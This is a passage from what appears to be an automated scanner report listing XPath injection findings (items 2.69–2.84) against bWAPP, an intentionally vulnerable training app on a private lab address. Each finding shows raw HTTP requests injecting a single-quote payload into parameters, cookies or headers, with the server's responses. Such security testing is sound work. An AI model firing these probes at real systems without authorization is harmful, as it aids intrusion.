Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.69. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13438

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.70. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 21
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2fJw%3d%3d
Connection: close

bug=6&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:04 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12704

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.71. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:03 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.72. http://192.168.52.147/bWAPP/ba_weak_pwd.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.73. http://192.168.52.147/bWAPP/ba_weak_pwd.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.74. http://192.168.52.147/bWAPP/ba_weak_pwd.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.75. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:56 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.76. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13332

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.77. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php?1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 21
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

bug=6&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12704

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.78. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 25
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

bug=6&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:18 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12704

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.79. http://192.168.52.147/bWAPP/ba_weak_pwd.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.80. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.81. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13329

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.82. http://192.168.52.147/bWAPP/ba_weak_pwd.php [top_security_nossl cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.83. http://192.168.52.147/bWAPP/bof_1.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.84. http://192.168.52.147/bWAPP/bof_1.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:52 GMT
